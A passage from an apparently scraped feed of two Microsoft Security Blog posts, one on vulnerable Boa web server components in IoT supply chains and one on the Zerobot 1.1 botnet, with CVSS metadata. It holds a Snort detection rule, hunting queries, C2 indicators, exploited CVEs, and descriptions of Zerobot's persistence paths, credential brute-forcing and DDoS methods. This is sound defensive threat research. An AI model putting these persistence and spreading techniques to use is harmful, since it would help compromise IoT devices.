[SolarWinds](<https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/>), have highlighted the importance of visibility across device components and proactively securing networks. A [report](<https://www.recordedfuture.com/continued-targeting-of-indian-power-grid-assets?__hstc=156209188.65c2d309abc7befc704e210a65154bf8.1666196607997.1666196607997.1666196607997.1&__hssc=156209188.1.1666196607998&__hsfp=2445685111>) published by Recorded Future in April 2022 detailed suspected electrical grid intrusion activity and implicated common IoT devices as the vector used to gain a foothold into operational technology (OT) networks and deploy malicious payloads. While investigating the attack activity, Microsoft researchers identified a vulnerable component on all the IP addresses published as IOCs and found evidence of a supply chain risk that may affect millions of organizations and devices.\n\nWe assessed the vulnerable component to be the Boa web server, which is often used to access settings and management consoles and sign-in screens in devices. Despite being discontinued in 2005, the Boa web server continues to be implemented by different vendors across a variety of IoT devices and popular software development kits (SDKs). Without developers managing the Boa web server, its known vulnerabilities could allow attackers to silently gain access to networks by collecting information from files. Moreover, those affected may be unaware that their devices run services using the discontinued Boa web server, and that firmware updates and downstream patches do not address its known vulnerabilities.\n\nIn this blog, we detail the risks affiliated with vulnerable components, highlighting the Boa web server, and how we suspect these components could be exploited to target critical industries. We also discuss the difficulties with identifying these components in device supply chains. To provide comprehensive protection against such attacks, we offer detection information to identify vulnerable components and guidance for organizations and network operators to improve their security posture.\n\n## Investigating the attack activity\n\nThe attack detailed in the Recorded Future report was one of several intrusion attempts on Indian critical infrastructure since 2020, with the [most recent attack](<https://www.bleepingcomputer.com/news/security/hive-claims-ransomware-attack-on-tata-power-begins-leaking-data/>) on IT assets confirmed in October 2022. Microsoft assesses that Boa servers were running on the IP addresses on the list of IOCs published by Recorded Future at the time of the report\u2019s release and that the electrical grid attack targeted exposed IoT devices running Boa.\n\nMicrosoft further identified that half of the IP addresses published by Recorded Future returned suspicious HTTP response headers, which might be associated with the active deployment of the malicious tool identified by Recorded Future. The combination of Boa and suspicious response headers was identified on another set of IP addresses, displaying similar behavior to those found by Recorded Future. While these IP addresses are not confirmed as malicious, we recommend they be monitored to ensure no additional suspicious activity. Users of Microsoft Defender Threat Intelligence will find these IP addresses in the portal labeled as block-listed or suspicious:\n\n * 122[.]117[.]212[.]65\n * 103[.]58[.]93[.]133\n * 125[.]141[.]38[.]53\n * 14[.]45[.]33[.]239\n * 14[.]55[.]86[.]138\n * 183[.]108[.]133[.]29\n * 183[.]99[.]53[.]180\n * 220[.]94[.]133[.]121\n * 58[.]76[.]177[.]166\n\nInvestigating the headers further indicated that over 10% of all active IP addresses returning the headers were related to critical industries, such as the petroleum industry and associated fleet services, with many of the IP addresses associated to IoT devices, such as routers, with unpatched critical vulnerabilities, highlighting an accessible attack vector for malware operators. Most of the suspicious HTTP response headers were returned over a short timeframe of several days, leading researchers to believe they may be associated with intrusion and malicious activity on networks.\n\nSince the report\u2019s publication, Microsoft researchers tracking the published IPs hosts have observed that all IP addresses have been compromised by a variety of attackers employing different malicious methods. For example, some of the IP addresses were further leveraged to download a variant of the Mirai malware family shortly following the report's release. Microsoft also found evidence that across different devices on the IP addresses, there were attempts to connect with default credentials through brute force methods and attempts to run shell commands. Microsoft continues to see attackers attempting to exploit Boa vulnerabilities beyond the timeframe of the released report, indicating that it is still targeted as an attack vector.\n\n## Boa widespread through SDKs\n\nThe Boa web server is widely implemented across a variety of devices, including IoT devices ranging from routers to cameras, and is often used to access settings and management consoles as well as sign-in screens. The popularity of Boa web servers is especially concerning as Boa has been formally discontinued since 2005. Data from the Microsoft Defender Threat Intelligence platform identified over 1 million internet-exposed Boa server components around the world over the span of a week, as depicted in the below figure:\n\nFigure 1. Global mapping of internet-exposed Boa web servers on devices\n\nBoa web servers remain pervasive in the development of IoT devices, one reason for this could be its inclusion in popular SDKs, which contain essential functions that operate system on chip (SOC) implemented in microchips. Vulnerable components like Boa and SDKs are often distributed to customers within devices, contributing to [supply chain vulnerabilities](<https://www.microsoft.com/security/business/microsoft-digital-defense-report-2022>). Popular SDKs like those released by RealTek, are used in SOCs provided to companies that manufacture gateway devices like routers, access points, and repeaters. Critical vulnerabilities such as [CVE-2021-35395](<https://nvd.nist.gov/vuln/detail/CVE-2021-35395>), which affected the digital administration of devices using RealTek\u2019s SDK, and [CVE-2022-27255](<https://nvd.nist.gov/vuln/detail/CVE-2022-27255>), a zero-click overflow vulnerability, [reportedly affect millions of devices](<https://www.bleepingcomputer.com/news/security/exploit-out-for-critical-realtek-flaw-affecting-many-networking-devices/>) globally and allow attackers to launch code, compromise devices, [deploy botnets](<https://www.bleepingcomputer.com/news/security/botnet-targets-hundreds-of-thousands-of-devices-using-realtek-sdk/?fbclid=IwAR1Bp2n0EXpD01pNGfs7T24Rdc2HeCPrN4za5Pj21CXFNPgOFFG-I_ZMXtg>), and move laterally on networks.\n\nWhile patches for the RealTek SDK vulnerabilities are available, some vendors may not have included them in their device firmware updates, and the updates do not include patches for Boa vulnerabilities. Boa servers are affected by several known vulnerabilities, including CVE-2009-4496, which could allow attackers to execute code remotely. Additional vendor and device specific vulnerabilities exist across a range of devices including routers.\n\nFigure 2. The IoT device supply chain demonstrates how vulnerabilities are distributed downstream to organizations and their assets\n\nThe popularity of the Boa web server displays the potential exposure risk of an insecure supply chain, even when security best practices are applied to devices in the network. Updating the firmware of IoT devices does not always patch SDKs or specific SOC components and there is limited visibility into components and whether they can be updated. The known CVEs impacting such components can allow an attacker to collect information about network assets before initiating attacks, and to gain access to a network undetected by obtaining valid credentials. In critical infrastructure networks, being able to collect information undetected prior to the attack allows the attackers to have much greater impact once the attack is initiated, potentially disrupting operations that can cost millions of dollars and affect millions of people.\n\n## Recommendations\n\nAs attackers seek new footholds into increasingly secure devices and networks, identifying and preventing distributed security risks through software and hardware supply chains, like outdated components, should be prioritized by organizations. This case displays the importance of proactive cyber security practices and the need to identify vulnerable components that may be leveraged by attackers.\n\nMicrosoft recommends that organizations and network operators follow best practice guidelines for their networks:\n\n * **Patch vulnerable devices whenever possible** to reduce exposure risks across your organization.\n * **Utilize device discovery and classification** to identify devices with vulnerable components by enabling vulnerability assessments, which identifies unpatched devices in the organizational network and set workflows for initiating appropriate patch processes with solutions like [Microsoft Defender Vulnerability Management](<https://learn.microsoft.com/microsoft-365/security/defender-vulnerability-management/defender-vulnerability-management>) and [Microsoft Defender for Endpoint](<https://www.microsoft.com/security/business/endpoint-security/microsoft-defender-endpoint?rtc=1>) with [Microsoft Defender for IoT ](<https://learn.microsoft.com/microsoft-365/security/defender-endpoint/enable-microsoft-defender-for-iot-integration>).\n * **Extend vulnerability and risk detection beyond the firewall** with platforms like [Microsoft Defender External Attack Surface Management](<https://learn.microsoft.com/azure/external-attack-surface-management/>). Customers can identify internet-exposed infrastructure running Boa web server components in their inventory and use the insights tile under the Attack Surface Summary dashboard to surface assets vulnerable to CVE-2009-4496. The insight can be found under High Severity Observations.\n * **Reduce the attack surface** by eliminating unnecessary internet connections to IoT devices in the network. Apply network segmentation to prevent an attacker from moving laterally and compromising assets after intrusion. IoT and critical device networks should be isolated with firewalls.\n * **Use proactive antivirus scanning** to identify malicious payloads on devices.\n * **Configure detection rules to identify malicious activity **whenever possible. Security personnel can use our snort rule below to configure security solutions to detect CVE-2022-27255 on assets using the RealTek SDK.\n \n \n alert udp any any -> any any (msg:\"Realtek eCOS SDK SIP Traffic Exploit CVE-2022-27255\"; content: \"invite\"; depth: 6; nocase; content: \"sip:\"; content: \"m=audio \"; isdataat: 128,relative; content:!\"|0d|\"; within: 128;sid:20221031;)\n\n * **Adopt a comprehensive IoT and OT solution** like [Microsoft Defender for IoT](<https://www.microsoft.com/security/business/endpoint-security/microsoft-defender-iot>) to monitor devices, respond to threats, and increase visibility in order to detect and alert when IoT devices with Boa are used as an entry point to a network and protect critical infrastructure. \n\n_**_**Adam Castleman, Jordan Herman**_**_, Microsoft Defender Threat Intelligence_ \n**_**Rotem Sde Or, Ilana Sivan, Gil Regev**_**_, Microsoft Defender for IoT Research Team_ \n**_**Ross Bevington**_**_, Microsoft Threat Intelligence Center__\n\nThe post [Vulnerable SDK components lead to supply chain risks in IoT and OT environments](<https://www.microsoft.com/en-us/security/blog/2022/11/22/vulnerable-sdk-components-lead-to-supply-chain-risks-in-iot-and-ot-environments/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/en-us/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-11-22T17:00:00", "type": "mmpc", "title": "Vulnerable SDK components lead to supply chain risks in IoT and OT environments", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-4496", "CVE-2021-35395", "CVE-2021-44228", "CVE-2022-27255"], "modified": "2022-11-22T17:00:00", "id": "MMPC:567C6CC66BD942B4F1BBE84ED9F6665B", "href": "https://www.microsoft.com/en-us/security/blog/2022/11/22/vulnerable-sdk-components-lead-to-supply-chain-risks-in-iot-and-ot-environments/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-12-21T20:35:18", "description": "Botnet malware operations are a constantly evolving threat to devices and networks. Threat actors target Internet of Things (IoT) devices for recruitment into malicious operations as IoT devices\u2019 configurations often leave them exposed, and the number of internet-connected devices continue to grow. Recent trends have shown that operators are redeploying malware for a variety of distributions and objectives, modifying existing botnets to scale operations and add as many devices as possible to their infrastructure.\n\nZerobot, a Go-based botnet that spreads primarily through IoT and web application vulnerabilities, is an example of an evolving threat, with operators continuously adding new exploits and capabilities to the malware. The Microsoft Defender for IoT research team has been monitoring Zerobot (also called ZeroStresser by its operators) for months. Zerobot is offered as part of a malware as a service scheme and has been updated several times since Microsoft started to track it. One domain with links to Zerobot was among several domains associated with DDoS-for-hire services [seized by the FBI](<https://www.justice.gov/usao-cdca/pr/federal-prosecutors-los-angeles-and-alaska-charge-6-defendants-operating-websites>) in December 2022.\n\nMicrosoft has previously reported on the [evolving threat ecosystem](<https://www.microsoft.com/en-us/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/>). The shift toward malware as a service in the cyber economy has industrialized attacks and has made it easier for attackers to purchase and use malware, establish and maintain access to compromised networks, and utilize ready-made tools to perform their attacks. We have tracked advertisements for the Zerobot botnet on various social media networks in addition to other announcements regarding the sale and maintenance of the malware, as well as new capabilities in development.\n\nIn this blog post, we present information about the latest version of the malware, Zerobot 1.1, including newly identified capabilities and further context to Fortinet\u2019s recent [analysis](<https://www.fortinet.com/blog/threat-research/zerobot-new-go-based-botnet-campaign-targets-multiple-vulnerabilities>) on the threat. Zerobot 1.1 increases its capabilities with the inclusion of new attack methods and new exploits for supported architectures, expanding the malware\u2019s reach to different types of devices. In addition to these findings, we\u2019re sharing new indicators of compromise (IOCs) and recommendations to help defenders protect devices and networks against this threat.\n\n## What is Zerobot?\n\nZerobot affects a variety of devices that include firewall devices, routers, and cameras, adding compromised devices to a distributed denial of service (DDoS) botnet. Using several modules, the malware can infect vulnerable devices built on diverse architectures and operating systems, find additional devices to infect, achieve persistence, and attack a range of protocols. Microsoft tracks this activity as DEV-1061.\n\nThe most recent distribution of Zerobot includes additional capabilities, such as exploiting vulnerabilities in Apache and Apache Spark (CVE-2021-42013 and CVE-2022-33891 respectively), and new DDoS attack capabilities.\n\nMicrosoft uses DEV-#### designations as a temporary name given to an unknown, emerging, or developing cluster of threat activity, allowing Microsoft to track it as a unique set of information until we can reach high confidence about the origin or identity of the actor behind the activity. Once it meets defined criteria, a DEV group is converted to a named actor.\n\n## How Zerobot gains and maintains device access\n\nIoT devices are often internet-exposed, leaving unpatched and improperly secured devices vulnerable to exploitation by threat actors. Zerobot is capable of propagating through brute force attacks on vulnerable devices with insecure configurations that use default or weak credentials. The malware may attempt to gain device access by using a combination of eight common usernames and 130 passwords for IoT devices over SSH and telnet on ports 23 and 2323 to spread to devices. Microsoft researchers identified numerous SSH and telnet connection attempts on default ports 22 and 23, as well as attempts to open ports and connect to them by port-knocking on ports 80, 8080, 8888, and 2323.\n\nIn addition to brute force attempts on devices, Zerobot exploits dozens of vulnerabilities, which malware operators add on a rolling basis to gain access and inject malicious payloads. Zerobot 1.1 includes several new vulnerabilities, such as:\n\n**Vulnerability**| **Affected software** \n---|--- \nCVE-2017-17105| Zivif PR115-204-P-RS \nCVE-2019-10655| Grandstream \nCVE-2020-25223| WebAdmin of Sophos SG UTM \nCVE-2021-42013| Apache \nCVE-2022-31137| Roxy-WI \nCVE-2022-33891| Apache Spark \nZSL-2022-5717| MiniDVBLinux \n \nSince the release of Zerobot 1.1, the malware operators have removed CVE-2018-12613, a phpMyAdmin vulnerability that could allow threat actors to view or execute files. Microsoft researchers have also identified that previous reports have used the vulnerability ID \u201cZERO-32906\u201d for CVE-2018-20057, \u201cGPON\u201d for CVE-2018-10561, and \u201cDLINK\u201d for CVE-2016-20017; and that CVE-2020-7209 was mislabeled as CVE-2017-17106 and CVE-2022-42013 was mislabeled as CVE-2021-42013.\n\nMicrosoft researchers have also found new evidence that Zerobot propagates by compromising devices with known vulnerabilities that are not included in the malware binary, such as CVE-2022-30023, a command injection vulnerability in Tenda GPON AC1200 routers.\n\nUpon gaining device access, Zerobot injects a malicious payload, which may be a generic script called _zero.sh _that downloads and attempts to execute Zerobot, or a script that downloads the Zerobot binary of a specific architecture. The bash script that attempts to download different Zerobot binaries tries to identify the architecture by brute-force, attempting to download and execute binaries of various architectures until it succeeds, as IoT devices are based on many computer processing units (CPUs). Microsoft has observed scripts targeting various architectures including ARM64, MIPS, and x86_64.\n\nDepending on the operating system of the device, the malware has different persistence mechanisms. Persistence tactics are used by malware operators to obtain and maintain access to devices. While Zerobot is unable to spread to Windows machines, we have found several samples that can run on Windows. On Windows machines, the malware copies itself to the Startup folder with the file name _FireWall.exe_ (older versions use _my.exe)_. Microsoft Defender for Endpoint detects this malware and related malicious activity on both Windows and Linux devices. See detection details below.\n\nTo achieve persistence on Linux-based devices, Zerobot uses a combination of desktop entry, daemon, and service methods:\n\n**Desktop entry:**\n\nZerobot copies itself to _$HOME/.config/ssh.service/sshf_ then writes a desktop entry file called _sshf.desktop_ to the same directory. Older Linux versions use _$HOME/.config/autostart_ instead of _$HOME/.config/ssh.service_.\n\n**Daemon:**\n\nCopies itself to _/usr/bin/sshf_ and writes a configuration at _/etc/init/sshf.conf_.\n\n**Service:**\n\nCopies itself to _/etc/sshf_ and writes a service configuration at _/lib/system/system/sshf.service_, then enables the service (to make sure it starts at boot) with two commands:\n\n * _systemctl enable sshf_\n * _service enable sshf_\n\nAll persistence mechanisms on older Linux versions use _my.bin_ and _my.bin.desktop_ instead of _sshf_ and _sshf.desktop._\n\n## New attack capabilities\n\nIn addition to the functions and attacks included in previous versions of the malware, Zerobot 1.1 has additional DDoS attack capabilities. These functions allow threat actors to target resources and make them inaccessible. Successful DDoS attacks may be used by threat actors to extort ransom payments, distract from other malicious activities, or disrupt operations. In almost every attack, the destination port is customizable, and threat actors who purchase the malware can modify the attack according to their target.\n\nThe following are the previously known Zerobot capabilities:\n\n**Attack method**| **Description** \n---|--- \nUDP_LEGIT| Sends UDP packets without data. \nMC_PING| Meant for DDoS on Minecraft servers. Sends a handshake and status request. \nTCP_HANDSHAKE| Floods with TCP handshakes. \nTCP_SOCKET| Continuously sends random payloads on an open TCP socket. Payload length is customizable. \nTLS_SOCKET| Continuously sends random payloads on an open TLS socket. Payload length is customizable. \nHTTP_HANDLE| Sends HTTP GET requests using a Golang standard library. \nHTTP_RAW| Formats and sends HTTP GET requests. \nHTTP_BYPASS| Sends HTTP GET requests with spoofed headers. \nHTTP_NULL| HTTP headers are each one random byte (not necessarily ascii). \n \nPreviously undisclosed and new capabilities are the following:\n\n**Attack method**| **Description** \n---|--- \nUDP_RAW| Sends UDP packets where the payload is customizable. \nICMP_FLOOD| Supposed to be an ICMP flood, but the packet is built incorrectly. \nTCP_CUSTOM| Sends TCP packets where the payload and flags are fully customizable. \nTCP_SYN| Sends SYN packets. \nTCP_ACK| Sends ACK packets. \nTCP_SYNACK| Sends SYN-ACK packets. \nTCP_XMAS| Christmas tree attack (all TCP flags are set). The reset cause field is \u201cxmas\u201d. \n \n## How Zerobot spreads\n\nAfter persistence is achieved, Zerobot scans for other internet-exposed devices to infect. The malware randomly generates a number between 0 and 255 and scans all IPs starting with this value. Using a function called _new_botnet_selfRepo_isHoneypot_, the malware tries to identify honeypot IP addresses, which are used by network decoys to attract cyberattacks and collect information on threats and attempts to access resources. This function includes 61 IP subnets, preventing scanning of these IPs.\n\nMicrosoft researchers also identified a sample that can run on Windows based on a cross-platform (Linux, Windows, macOS) open-source remote administration tool (RAT) with various features such as managing processes, file operations, screenshotting, and running commands. This tool was found by investigating the command-and-control (C2) IPs used by the malware. The script, which is used to download this RAT, is called _impst.sh_:\n\nFigure 1. The _impst.sh_ script used to download the remote administration tool\n\n## Defending devices and networks against Zerobot\n\nThe continuous evolution and rapid addition of new capabilities in the latest Zerobot version underscores the urgency of implementing comprehensive security measures. Microsoft recommends the following steps to protect devices and networks against the threat of Zerobot:\n\n * Use security solutions with cross-domain visibility and detection capabilities like [Microsoft 365 Defender](<https://www.microsoft.com/security/business/threat-protection/microsoft-365-defender>), which provides integrated defense across endpoints, identities, email, applications, and data. Microsoft Defender Antivirus and Microsoft Defender for Endpoint detect Zerobot malware variants and malicious behavior related to this threat.\n * Adopt a comprehensive IoT security solution such as [Microsoft Defender for IoT](<https://www.microsoft.com/security/business/endpoint-security/microsoft-defender-iot>) to allow visibility and monitoring of all IoT and OT devices, threat detection and response, and integration with SIEM/SOAR and XDR platforms such as Microsoft Sentinel and Microsoft 365 Defender.\n * Ensure secure configurations for devices: Change the default password to a strong one, and block SSH from external access.\n * Maintain device health with updates: Make sure devices are up to date with the latest firmware and patches.\n * Use least privileges access: Use a secure virtual private network (VPN) service for remote access and restrict remote access to the device.\n * Harden endpoints with a comprehensive Windows security solution:\n * Manage the apps your employees can use through Windows Defender Application Control and for unmanaged solutions, enabling Smart App Control.\n * Perform timely cleanup of all unused and stale executables sitting on yours or your organizations\u2019 devices.\n\n## Detections\n\n**Microsoft Defender for IoT**\n\nMicrosoft Defender for IoT uses detection rules and signatures to identify malicious behavior. Microsoft Defender for IoT has alerts for the following vulnerabilities and exploits which may be tied to Zerobot activity:\n\n * CVE-2014-8361\n * CVE-2016-20017\n * CVE-2017-17105\n * CVE-2017-17215\n * CVE-2018-10561\n * CVE-2018-20057\n * CVE-2019-10655\n * CVE-2020-7209\n * CVE-2020-10987\n * CVE-2020-25506\n * CVE-2021-35395\n * CVE-2021-36260\n * CVE-2021-42013\n * CVE-2021-46422\n * CVE-2022-22965\n * CVE-2022-25075\n * CVE-2022-26186\n * CVE-2022-26210\n * CVE-2022-30023\n * CVE-2022-30525\n * CVE-2022-31137\n * CVE-2022-33891\n * CVE-2022-34538\n * CVE-2022-37061\n * ZERO-36290\n * ZSL-2022-5717\n\n**Microsoft Defender Antivirus**\n\nMicrosoft Defender Antivirus detects the malicious files under the following platforms and threat names:\n\n * Zerobot (Win32/64 and Linux)\n * SparkRat (Win32/64 and Linux)\n\n**Microsoft Defender for Endpoint**\n\nMicrosoft Defender for Endpoint alerts with the following titles can indicate threat activity on your network:\n\n * DEV-1061 threat activity group detected\n * An active 'PrivateLoader' malware process was detected while executing\n * 'Morila' malware was prevented\n * 'Multiverze' malware was detected\n\nMicrosoft Defender for Endpoint also has detections for the following vulnerabilities exploited by Zerobot:\n\n * CVE-2022-22965 (Spring4Shell)\n\nMicrosoft Defender for Endpoint's Device Discovery capabilities discover and classify devices. With these capabilities, Microsoft 365 Defender customers using Microsoft Defender for IoT have visibility into security recommendations for devices with the following vulnerabilities:\n\n * CVE-2014-8361\n * CVE-2019-10655\n * CVE-2020-25506\n * CVE-2021-36260\n * CVE-2021-42013\n * CVE-2022-30525\n * CVE-2022-31137\n * CVE-2022-37061\n\nDevices with these vulnerabilities are also visible in the Microsoft Defender Vulnerability Management inventory.\n\n**Microsoft Defender for Cloud**\n\nMicrosoft Defender for Cloud alerts with the following titles can indicate threat activity on your network:\n\n * VM_ReverseShell\n * VM_SuspectDownloadArtifacts\n * SQL.VM_ShellExternalSourceAnomaly\n * AppServices_CurlToDisk\n\n## Advanced hunting queries\n\n### **Microsoft 365 Defender**\n\nMicrosoft 365 Defender customers can run the following query to find related activity in their networks.\n\n**Zerobot files**\n\nThis query finds the file hashes associated with Zerobot activity.\n \n \n let IoCList = externaldata(TimeGenerated:datetime,IoC:string,IoC_Type:string,ExpirationDateTime:datetime,Description:string, Action:string, ConfidenceScore:real, ThreatType:string, Active:string,Type:string, TrafficLightProtocolLevel:string, \n ActivityGroupNames:string)[@\"https://raw.githubusercontent.com/microsoft/mstic/master/RapidReleaseTI/Indicators.csv\"] \n with(format=\"csv\", ignoreFirstRecord=True);\n let shahashes = IoCList\n | where IoC_Type =~ \"sha256\" and Description =~ \"Dev-1061 Zerobot affecting IoT devices\"\n | distinct IoC;\n DeviceFileEvents\n | where SHA256 in (shahashes)\n\n**Zerobot HTTP requests**\n\nThis query finds suspicious HTTP requests originated by the IOCs associated with Zerobot activity.\n \n \n DeviceNetworkEvents\n | where RemoteIP in(\"176.65.137.5\",\"176.65.137.6\")\n | where ActionType == \"NetworkSignatureInspected\"\n | where Timestamp > ago(30d)\n |extend json = parse_json(AdditionalFields)\n | extend SignatureName =tostring(json.SignatureName), SignatureMatchedContent = tostring(json.SignatureMatchedContent), SignatureSampleContent = tostring(json.SamplePacketContent)\n |where SignatureName == \"HTTP_Client\"\n |project Timestamp, DeviceId, DeviceName, RemoteIP, RemotePort, LocalIP, LocalPort, SignatureName, SignatureMatchedContent, SignatureSampleContent\n \n\n**Zerobot port knocking**\n\nThis query finds incoming connections from IOCs associated with Zerobot activity.\n \n \n DeviceNetworkEvents\n | where RemoteIP in(\"176.65.137.5\",\"176.65.137.6\")\n | where ActionType == \"InboundConnectionAccepted\"\n | where Timestamp > ago(30d)\n |project Timestamp, DeviceId, DeviceName, RemoteIP, RemotePort, LocalIP, LocalPort, InitiatingProcessFileName\n \n\n### **Microsoft Sentinel**\n\nMicrosoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with \u2018TI map\u2019) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace. More details on the Content Hub can be found here: <https://learn.microsoft.com/azure/sentinel/sentinel-solutions-deploy>\n\n## Indicators of compromise (IOCs):\n\n**Domains and IP addresses:**\n\n * zero[.]sudolite[.]ml\n * 176.65.137[.]5\n * 176.65.137[.]5:1401\n * 176.65.137[.]6\n * ws[:]//176.65.137[.]5/handle\n * http[:]//176.65.137[.]5:8000/ws\n\n**New Zerobot hashes (SHA-256)**\n\n * aed95a8f5822e9b1cd1239abbad29d3c202567afafcf00f85a65df4a365bedbb\n * bf582b5d470106521a8e7167a5732f7e3a4330d604de969eb8461cbbbbdd9b9a\n * 0a5eebf19ccfe92a2216c492d6929f9cac72ef37089390572d4e21d0932972c8\n * 1e7ca210ff7bedeefadb15a9ec5ea68ad9022d0c6f41c4e548ec2e5927026ba4\n * 05b7517cb05fe1124dd0fad4e85ddf0fe65766a4c6c9986806ae98a427544e9d\n * 5625d41f239e2827eb05bfafde267109549894f0523452f7a306b53b90e847f2\n * c304a9156a032fd451bff49d75b0e9334895604549ab6efaab046c5c6461c8b3\n * 66c76cfc64b7a5a06b6a26976c88e24e0518be3554b5ae9e3475c763b8121792\n * 539640a482aaee2fe743502dc59043f11aa8728ce0586c800193e30806b2d0e5\n * 0f0ba8cc3e46fff0eef68ab5f8d3010241e2eea7ee795e161f05d32a0bf13553\n * 343c9ca3787bf763a70ed892dfa139ba69141b61c561c128084b22c16829c5af\n * 874b0691378091a30d1b06f2e9756fc7326d289b03406023640c978ff7c87712\n * 29eface0054da4cd91c72a0b2d3cda61a02831b4c273e946d7e106254a6225a7\n * 4a4cb8516629c781d5557177d48172f4a7443ca1f826ea2e1aa6132e738e6db2\n * bdfd89bdf6bc2de5655c3fe5f6f4435ec4ad37262e3cc72d8cb5204e1273ccd6\n * 62f23fea8052085d153ac7b26dcf0a15fad0c27621f543cf910e37f8bf822e0e\n * 788e15fd87c45d38629e3e715b0cb93e55944f7c4d59da2e480ffadb6b981571\n * 26e68684f5b76d9016d4f02b8255ff52d1b344416ffc19a2f5c793ff1c2fdc65\n * e4840c5ac2c2c2170d00feadb5489c91c2943b2aa13bbec00dbcffc4ba8dcc2d\n * 45059f26e32da95f4bb5dababae969e7fceb462cdeadf7d141c39514636b905a\n * 77dd28a11e3e4260b9a9b60d58cb6aaaf2147da28015508afbaeda84c1acfe70\n * cf232e7d39094c9ba04b9713f48b443e9d136179add674d62f16371bf40cf8c8\n * 13657b64a2ac62f9d68aeb75737cca8f2ab9f21e4c38ce04542b177cb3a85521\n * eb33c98add35f6717a3afb0ab2f9c0ee30c6f4e0576046be9bf4fbf9c5369f71\n * e3dd20829a34caab7f1285b730e2bb0c84c90ac1027bd8e9090da2561a61ab17\n * 3685d000f6a884ca06f66a3e47340e18ff36c16b1badb80143f99f10b8a33768\n * cdc28e7682f9951cbe2e55dad8bc2015c1591f89310d8548c0b7a1c65dbefae3\n * 869f4fb3f185b2d1231d9378273271ddfeebb53085daede89989f9cc8d364f5f\n * 6c59af3ed1a616c238ee727f6ed59e962db70bc5a418b20b24909867eb00a9d6\n * ef28ee3301e97eefd2568a3cb4b0f737c5f31983710c75b70d960757f2def74e\n * 95e4cc13f8388c195a1220cd44d26fcb2e10b7b8bfc3d69efbc51beb46176ff1\n * 62f9eae8a87f64424df90c87dd34401fe7724c87a394d1ba842576835ab48afc\n * 54d1daf58ecd4d8314b791a79eda2258a69d7c69a5642b7f5e15f2210958bdce\n * 8176991f355db10b32b7562d1d4f7758a23c7e49ed83984b86930b94ccc46ab3\n * 8aa89a428391683163f0074a8477d554d6c54cab1725909c52c41db2942ac60f\n * fd65bd8ce671a352177742616b5facc77194cccec7555a2f90ff61bad4a7a0f6\n * 1e66ee40129deccdb6838c2f662ce33147ad36b1e942ea748504be14bb1ee0ef\n * 57f83ca864a2010d8d5376c68dc103405330971ade26ac920d6c6a12ea728d3d\n * 7bfd0054aeb8332de290c01f38b4b3c6f0826cf63eef99ddcd1a593f789929d6\n\n****SparkRat** hashes (SHA-256): **\n\n * 0ce7bc2b72286f236c570b1eb1c1eacf01c383c23ad76fd8ca51b8bc123be340\n * cacb77006b0188d042ce95e0b4d46f88828694f3bf4396e61ae7c24c2381c9bf\n * 65232e30bb8459961a6ab2e9af499795941c3d06fdd451bdb83206a00b1b2b88\n\n_**Rotem Sde-Or**, **Ilana Sivan**, **Gil Regev**, Microsoft Defender for IoT Research Team \n**Meitar Pinto**, **Nimrod Roimy**, **Nir Avnery**, Microsoft Defender Research Team \n**Ramin Nafisi**, **Ross Bevington**, Microsoft Threat Intelligence Center (MSTIC)_\n\nThe post [Microsoft research uncovers new Zerobot capabilities](<https://www.microsoft.com/en-us/security/blog/2022/12/21/microsoft-research-uncovers-new-zerobot-capabilities/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/en-us/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-12-21T20:00:00", "type": "mmpc", "title": "Microsoft research uncovers new Zerobot capabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8361", "CVE-2016-20017", "CVE-2017-17105", "CVE-2017-17106", "CVE-2017-17215", "CVE-2018-10561", "CVE-2018-12613", "CVE-2018-20057", "CVE-2019-10655", "CVE-2020-10987", "CVE-2020-25223", "CVE-2020-25506", "CVE-2020-7209", "CVE-2021-35395", "CVE-2021-36260", "CVE-2021-42013", "CVE-2021-46422", "CVE-2022-22965", "CVE-2022-25075", "CVE-2022-26186", "CVE-2022-26210", 